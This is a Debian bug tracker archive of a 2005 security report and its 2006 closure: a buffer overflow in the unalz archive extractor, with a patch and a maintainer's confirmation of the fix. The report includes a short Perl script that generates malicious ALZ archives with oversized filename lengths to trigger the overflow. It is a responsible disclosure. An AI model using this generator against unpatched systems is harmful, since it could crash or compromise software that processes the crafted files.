[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Bug#340842: marked as done (unalz: buffer overflow when extracting archives)

Your message dated Sat, 17 Jun 2006 11:43:39 +0200
with message-id <20060617094339.GA309@uio.no>
and subject line Bug#340842 acknowledged by developer (Re: unalz: buffer overflow when extracting archives)
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)
--- Begin Message --- 
Subject: unalz: buffer overflow when extracting archives
Package: unalz
Version: 0.52-1
Severity: grave
Justification: user security hole
Tags: security patch sarge etch sid

Hello,

I have found a buffer overflow security vulnerability in unalz. It
occurs when it extracts malicious ALZ archives.

I have attached the archives oflow333.alz (for sarge) and oflow1621.alz
(for testing and unstable), as well as the program alzgen.pl that
generated them and a patch that corrects this issue.

It is also possible to upgrade to the latest upstream version 0.53,
which also corrects it.

// Ulf Härnhammar, Debian Security Audit Project

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12-1-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages unalz depends on:
ii  libc6                         2.3.5-8    GNU C Library: Shared libraries an
ii  libgcc1                       1:4.0.2-2  GCC support library
ii  libstdc++6                    4.0.2-2    The GNU Standard C++ Library v3

unalz recommends no packages.

-- no debconf information

Attachment: oflow333.alz
Description: Binary data

Attachment: oflow1621.alz
Description: Binary data

#!/usr/bin/perl --

# alzgen
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

die "usage: $0 <length> <filename>\n" unless @ARGV == 2;
$len = shift;
$lenhi = int($len / 256);
$lenlo = $len - ($lenhi * 256);
$file = shift;

open(OUT, ">$file") or die "can't open file!\n";
print OUT "\x42\x4c\x5a\x01" .        # SIG_LOCAL_FILE_HEADER
          chr($lenlo) . chr($lenhi) . # filename length
          "\x00" x 7 .
          'U' x $len;
close OUT or die "can't close file!?!?\n";

--- UnAlz.cpp.old	2004-11-25 07:23:36.000000000 +0100
+++ UnAlz.cpp	2005-11-20 01:04:23.000000000 +0100
@@ -359,6 +359,8 @@
 		return FALSE;
 	}
 	FRead(zipHeader.fileName, zipHeader.head.fileNameLength);
+	if(zipHeader.head.fileNameLength > MAX_PATH - 5)
+		zipHeader.head.fileNameLength = MAX_PATH - 5;
 	zipHeader.fileName[zipHeader.head.fileNameLength] = (CHAR)NULL;

--- End Message ---
--- Begin Message --- 
Version: 0.55-1

On Thu, Mar 16, 2006 at 10:35:33AM -0800, Steve Langasek wrote:
>> It still looks closed (in all versions) to me. Are you sure that that is
>> what you want, instead of - say - fixing it?
> http://bugs.debian.org/cgi-bin/pkgreport.cgi?src=unalz&dist=unstable

This was fixed in a QA upload a while ago (0.55-1), since upstream 0.53 fixed
it; the changelog missed it, though. I've verified that the code does indeed
contain the patch given in the patch log, so I'm marking it as closed.

/* Steinar */
-- 
Homepage: http://www.sesse.net/

--- End Message ---
Reply to: